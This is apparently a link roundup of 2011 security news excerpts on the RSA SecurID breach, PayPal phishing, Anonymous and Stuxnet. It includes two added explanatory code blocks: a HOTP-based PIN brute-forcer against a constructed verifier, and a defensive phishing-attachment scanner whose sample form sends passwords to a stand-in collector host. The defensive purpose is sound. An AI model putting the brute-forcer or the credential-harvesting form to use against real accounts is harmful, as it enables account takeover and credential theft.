EU Agency Presents the First Report Ever on how to Measure IT Resilience



'....The European Network and Information Security Agency (ENISA) has published the 'Main Challenges and Recommendations on Network and Service Resilience Metrics' report, as well as a technical report. These are the first ever reports in Europe to address this area's lack of holistic review.......'





Serious new hole in Internet Banking system Dutch bank ING



'....Cyber criminals have found a new way to place purchase orders on the internet and have unsuspecting ING customers pay for the goods through PayPal. Using PayPal the crims can circumvent the authentication method used by ING, so called TAN codes......'



Retaliatory Deterrence in Cyberspace

Eric Sterner



'....This article first examines cyber vulnerabilities then moves to cyberdeterrence alternatives. Finally it proposes a cyberdeterrent posture......'



That was quick: Four lines of code is all it takes for The New York Times' paywall to come tumbling down

Joshua Benton



'....The New York Times paywall is costing the newspaper $40-$50 million to design and construct, Bloomberg has reported......'



Paypal gets hit with a sophisticated phishing attack

Dean Wilson



'....The key difference between this attack and similar phishing attempts is that it locally stores the phishing webpage, rather than redirecting the user to a specific URL, which can be caught by anti-phishing measures built into many popular web browsers. Storing the website locally allows the attack to completely bypass browsers' anti-phishing defences......'



The anatomy of an Internet-driven revolution



'....In the analysis, the role of social networks became apparent, as people in Egypt took to their mobile phones for communication. Facebook, Twitter and other social-networking tools experienced a dramatic increase in page views during the recent revolution in Egypt......'



Agora SCADA+ Pack

Yuriy Gurkin



'....SCADA and related vulnerabilities are very special due to their sensitive nature and the possibly huge impact of successful exploitation. The 22 modules include exploits for 11 zero-day vulnerabilities. SCADA systems are also "hard to patch"......'



Listen: Secret Libya Psyops, Caught by Online Sleuths

Noah Shachtman



'....We know this, not because some Pentagon official said so, but because one Dutch radio geek is monitoring the airwaves for information about Operation Odyssey Dawn — and tweeting the surprisingly-detailed results......'





The RSA SecurID Problem

Steven M. Bellovin



'....As has been widely reported, RSA suffered a serious security breach aimed at its SecurID product. The SecurID is a major product in its space ("token authentication", rather than the commonly reported "two factor authentication"; see below); a security problem with it would be a major issue indeed. But what, precisely, is the problem RSA experienced? They haven't said, which of course has led to a lot of speculation. There are many possible scenarios here; some are serious and some are not. I'm going to lay out a few possibilities......'



Reverse Engineering RSA's "Statement"

Steve Gibson



'....RSA may not want to do the responsible thing because it would be very expensive for them, but given the only deductions possible from what little RSA has said in light of the technology, any company using RSA SecurID tokens should consider them completely compromised and should insist upon their immediate replacement......'



UK resellers 'kept in dark' over RSA breach

Tom Espiner



'....RSA rival SecurEnvoy, which is co-run by ex-RSA employee Andrew Kemshall, said there was a possibility that keys for RSA SecurID tokens called 'seed records' may have been compromised. A seed record is 128 bits of data that RSA links to individual authentication tokens, and uses with an algorithm to generate pass numbers. Should seed records have been exposed to hackers, then SecurID products would only have a four-digit PIN to stop unknown hackers authenticating themselves as users, said Kemshall......'
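What Kemshall's point means in practice, as an added illustration that is not from the article above and not RSA's code: the open HOTP algorithm of RFC 4226 stands in for RSA's proprietary tokencode derivation (whose details are not public), the seed is the RFC's published test secret standing in for a stolen seed record, and the passcode format "PIN followed by tokencode" and the four-digit PIN are assumptions. With the seed in hand, the attacker computes the same tokencode the token displays, so the only thing left to guess is the PIN.

```python
import hashlib
import hmac
import struct

# Constructed seed: the RFC 4226 reference secret, standing in for a stolen seed record.
# It is not a SecurID seed, and hotp() below is the published HOTP algorithm, not RSA's.
STOLEN_SEED = b"12345678901234567890"
PIN_LENGTH = 4          # assumption, per the article's "four-digit PIN"
CODE_DIGITS = 6


def hotp(seed: bytes, counter: int, digits: int = CODE_DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_passcode(seed: bytes, pin: str, counter: int, submitted: str) -> bool:
    """Server-side check of a passcode formed as PIN + tokencode (assumed format)."""
    expected = pin + hotp(seed, counter)
    return hmac.compare_digest(expected, submitted)


def brute_force_pin(seed: bytes, counter: int, verify, pin_len: int = PIN_LENGTH):
    """What an attacker holding the seed has left to do: compute the tokencode
    himself and enumerate the PIN. Returns (pin, attempts); at most 10**pin_len
    attempts are needed, which is why lockout on failed attempts matters."""
    code = hotp(seed, counter)
    for n in range(10 ** pin_len):
        guess = f"{n:0{pin_len}d}"
        if verify(guess + code):
            return guess, n + 1
    return None, 10 ** pin_len


if __name__ == "__main__":
    user_pin = "1234"     # constructed victim PIN
    counter = 0
    oracle = lambda passcode: verify_passcode(STOLEN_SEED, user_pin, counter, passcode)
    print("tokencode:", hotp(STOLEN_SEED, counter))
    print("pin, attempts:", brute_force_pin(STOLEN_SEED, counter, oracle))
```

The oracle here is the authentication server itself: without an attempt counter and lockout, an attacker who holds the seed needs at most ten thousand login attempts against a four-digit PIN, and on average half that.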



RSA SecurID system hit by cyberattack

Elinor Mills



'....Information about RSA's SecurID authentication tokens — used by millions of people, including government and bank employees — was stolen during an "extremely sophisticated cyberattack", putting customers relying on them to secure their networks at risk......'


Top 10 Android Security Risks

Lisa Phifer



'....we consider today's biggest Android security risks and what can be done to mitigate them......'


IBM pays $10 mn to settle bribery complaint



'....The U.S. Securities and Exchange Commission alleged employees of IBM Korea and a local joint venture with LG Electronics paid around $207,000 in bribes to South Korean government officials, according to court documents on Friday.......'


Microsoft urges Office users to block Flash Player attacks

Gregg Keizer



'....Microsoft yesterday urged users of older Office suites to install and run a complicated tool to protect themselves against ongoing attacks ......'


Anonymous goes up against US Air Force social media manipulation

Tim Greene



'....The international collective known as Anonymous is trying to figure out just what the US Air Force wants with software that can create and manage phony identities on Facebook, Twitter, LinkedIn and other social networks. Called Operation Metal Gear, the effort is aimed at shining light on software that sets up phony Facebook, Twitter and other social media accounts and that helps operatives manage them so they seem like they were set up by real people, with the apparent object of gathering data about the actual real people they friend.......'


Chip & PIN is definitely broken - Credit Card skimming and PIN harvesting in an EMV world

Andrea Barisani, Daniele Bianco, Adam Laurie, Zac Franken



'....At the CanSecWest security conference held in Vancouver last week, four security researchers demonstrated the practicability of chip card skimming attacks – both with an insecure class of chip (SDA) and with a class that has been considered secure (DDA). EC and credit cards chipped according to EMV specifications are designed to hamper "skimming", an attack method which involves intercepting a user's card and PIN data.......'


Paypal gets hit with a sophisticated phishing attack

Dean Wilson



'....The attack, which is also being used to target Bank of America, Lloyds and TSB, is sent as part of an HTML attachment with unsolicited emails claiming to be legitimate. The key difference between this attack and similar phishing attempts is that it locally stores the phishing webpage, rather than redirecting the user to a specific URL......'
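Both excerpts from Dean Wilson's article make the same point: a phishing page delivered as an HTML attachment is opened from disk, so there is no URL for the browser's anti-phishing list to match. What a mail gateway can still look at is the form itself. The following scanner is an added example, not code from the article; the lure message, the attachment, the collector domain and the credential field names are all constructed for the illustration.

```python
import email
import email.policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment: a locally rendered "PayPal" login page whose form
# posts the credentials to an attacker-controlled host (hypothetical domain).
SAMPLE_ATTACHMENT = """<html><body>
<h1>PayPal - Confirm your account</h1>
<form method="post" action="http://collector.example.net/submit.php">
  <input type="email" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="Log In">
</form></body></html>"""

# Constructed benign HTML: a link, but no form asking for secrets.
SAMPLE_BENIGN = """<html><body><p>Your statement is ready.</p>
<a href="https://www.example.com/statements">View</a></body></html>"""

# Field names treated as credentials even when the input type is not "password".
CREDENTIAL_NAMES = {"password", "passwd", "pass", "pin", "ssn", "cardnumber", "cvv"}


class FormScanner(HTMLParser):
    """Collects each <form> with its action URL and the (type, name) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                ((a.get("type") or "text").lower(), (a.get("name") or "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_html(html: str):
    """Return (reason, action) findings for forms that collect secrets. A file opened
    from disk has no URL to check against a blocklist, so the judgement is made on
    the form itself: does it ask for a credential, and where does it send it?"""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        asks_secret = any(t == "password" or n in CREDENTIAL_NAMES
                          for t, n in form["inputs"])
        if not asks_secret:
            continue
        url = urlparse(form["action"])
        if url.netloc:
            reason = "credential form posts to external host " + url.netloc
            if url.scheme == "http":
                reason += " over plain HTTP"
        else:
            reason = "credential form with no absolute action in a standalone file"
        findings.append((reason, form["action"]))
    return findings


def scan_message(raw: bytes):
    """Run scan_html over every text/html attachment of an RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    return [(part.get_filename(), scan_html(part.get_content()))
            for part in msg.iter_attachments()
            if part.get_content_type() == "text/html"]


def build_sample_message() -> bytes:
    """Constructed lure: unsolicited mail carrying SAMPLE_ATTACHMENT as a .html file."""
    msg = EmailMessage()
    msg["From"] = "service@example.org"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Your account has been limited"
    msg.set_content("Please open the attached form to restore access.")
    msg.add_attachment(SAMPLE_ATTACHMENT, subtype="html", filename="paypal-verify.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, hits in scan_message(build_sample_message()):
        print(name, hits)
```

The check deliberately keys on the form's behaviour (it collects a password and sends it to a host the attachment does not belong to) rather than on a URL reputation lookup, which is exactly the control the locally stored page sidesteps. A real gateway would additionally block or quarantine HTML attachments outright for users who have no business receiving them.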


Hacker group Anonymous releases 'Bank of America emails' after WikiLeaks rumours

Victoria Ward



'....The leak was apparently made by a former employee of Balboa Insurance, a subsidiary of Bank of America which provides mortgage and car insurance for banks and home insurance for consumers......'



Alexandre Dulaunoy



'....traceroute-circl is an extended traceroute to support the activities of CSIRT (or CERT) operators. Usually CSIRT teams have to handle incidents based on IP addresses received....'


Complexity Is Killing Us: A Security State of the Union With Eugene Spafford of CERIAS

Jon Chase



'....There's also been a great deal of attention about moving to cloud-based computing and compliance. So a lot of focus has moved away from the basics of security: building secure systems, securing enterprise, reducing complexity, and dealing with computer crime. As a result, we're moving farther away from the fundamentals that need to be addressed......'


DDoS Attacks Primarily From China

Alexia Tsotsis



'....After recovering from the largest Distributed Denial of Service attack in the service's history ("multiple Gigabits per second and tens of millions of packets per second") yesterday morning, blog host was attacked again very early this morning......'


Saudi king did not offer $150 billion for Facebook

Emil Protalinski



'....The satirical website Dawn Wires recently posted an article titled "Saudi King to buy Facebook for $150 billion to end the revolt: Goldman Sachs to advise." It was filed under LoL News, and even concluded with the words "Sunday Humor."......'


Nigerian gets 22-year sentence for 419 fraud




'....A Nigerian man was sentenced to an effective 22 years in prison in the Germiston Regional Court yesterday.....'


Libyan authorities cut internet as civil war looms

Phil Muncaster



'....In what appears to be a desperate last attempt to disrupt widespread protests and halt civil war, the Libyan authorities appear again to have pulled the plug on all internet communications......'


Egypt: The Day the Secrets were Revealed



'....After the Egyptians succeeded in toppling Hosni Mubarak - they set their goal on cutting the hydra's tentacles. A full-waged war started last night against the dreaded State Security apparatus, known as Amn Dawla in Arabic......'


South Korea Web Sites Hit by Fresh Cyber Attack



'....The Korea Communications Commission (KCC) said the "distributed denial-of-service (DDoS)" attacks resumed Saturday morning against 29 websites including those of government agencies, Internet portals and banks......'


Data Mining: How Companies Now Know Everything About You

Joel Stein



'....You know how everything has seemed free for the past few years? It wasn't. It's just that no one told you that instead of using money......'



HBGary's Hoglund identifies lessons in Anonymous hack

Robert Lemos



'....Anyone with a cloud-based service needs to have an SLA (software license agreement) in the contract that says there is a priority security hotline so that when there is a security event you have priority support, rather than what happened to me, which is that I got round-robinned to what appeared to be a call center in India. And I'm waiting on the phone and I can't do the technical magic tricks, jumping through the hoops that Google wanted me to jump through, to get them to listen to me. It took me forever to get technical staff on the phone on Sunday afternoon, so they could make the necessary changes so that Google would even start talking to me. And meanwhile, they are downloading my e-mail spool......'


A Look Inside the Bustling Cybercrime Marketplace

Noa Bar-Yosef



'.... Buying, selling, haggling and cheating all take place in these marketplaces. Each marketplace houses other specialized-markets of illegitimate goods. There's the credit cards market, the bot rental market, another one for viruses, and one more for the credentials – to name a few......'


Cyber Vigilantes: Should We Cheer or Fear Them?

Ted Samson



'....The ongoing drama starring hacker group Anonymous and beleaguered security company HBGary has taken a startling twist: In the wake of HBGary CEO Aaron Barr resigning, a group of House Democrats plans to use information gleaned from stolen electronic documents to launch an investigation of HBGary Federal ......'


Iran's Natanz nuclear facility recovered quickly from Stuxnet cyberattack

Joby Warrick



'....In a six-month period between late 2009 and last spring, U.N. officials watched in amazement as Iran dismantled more than 10 percent of the Natanz plant's 9,000 centrifuge machines used to enrich uranium. Then, just as remarkably, hundreds of new machines arrived at the plant to replace the ones that were lost.......'


Cyber attack hits Ottawa; probe focuses on IP addresses from China




'....According to senior federal officials, an attack that first became public at Treasury Board earlier this month also hit elsewhere in the federal public service, including Finance. An investigation into the attack is focused on Chinese IP addresses......'


NSA reveals its secret: No backdoor in encryption standard

William Jackson



'...."We're actually pretty good guys," said Dickie George. "We wanted to make sure we were as squeaky clean as possible." Besides, "I don't think we were good enough to sneak things in that you guys wouldn't have found," he told a crowd of crypto professionals and security officials......'


RSA: Cyber War Mass Hysteria Is Hindering Security

Eric Doyle



'...."Cyber war is a terrible metaphor," said the US government's cybersecurity czar Howard Schmidt. "Don't make it something it's not." Internet attacks from hackers, spies and terrorist groups deserve serious attention, he said, but this should not be "to the extent of mass hysteria"......'


Microsoft bans open source from the Marketplace

Gareth Halfacree



'....Microsoft has raised the ire of the open source community with its Windows Marketplace licence by specifically refusing to allow software covered......'


Software Vulnerability Management at Microsoft



'....Tim Rains, Group Product Manager in Trustworthy Computing Communications, introduces an in-depth video series describing the processes Microsoft follows to protect customers and minimize disruption......'


America's power grid too vulnerable to cyberattack, US report finds

Mark Clayton



'...."Our testing revealed that such standards did not always include controls commonly recommended for protecting critical information systems," including tough password and log-in protections, the report said. The plodding implementation is "not adequate to ensure that systems-related risks to the Nation's power grid were mitigated or addressed in a timely manner.".....'


On-line threats a fundamental weakness in Australian security

John Blackburn and Gary Waters



'....A Kokoda Foundation report, Optimising Australia's Response to the Cyber Challenge, to be released today has found that cyber security has become the fundamental weakness in Australia's national security, and that the threat is poorly understood by politicians.....'


Latest Updates on Day 7 of Protests in Egypt




'....A stream of Twitter updates by bloggers and journalists we're following is in the right column of this blog. Updates below mix alerts on breaking news with reports from other Web sites and video, photographs and eyewitness accounts posted on social networks......'


Evil on the Internet

Richard Clayton



'....Phishing websites collect banking credentials; mule recruitment websites entice people into money laundering; fake escrow sites defraud the winners of online auctions; fake banks hold the cash for fake African dictators; and there are even Ponzi scheme websites where (almost) everyone knows that they're a scam......'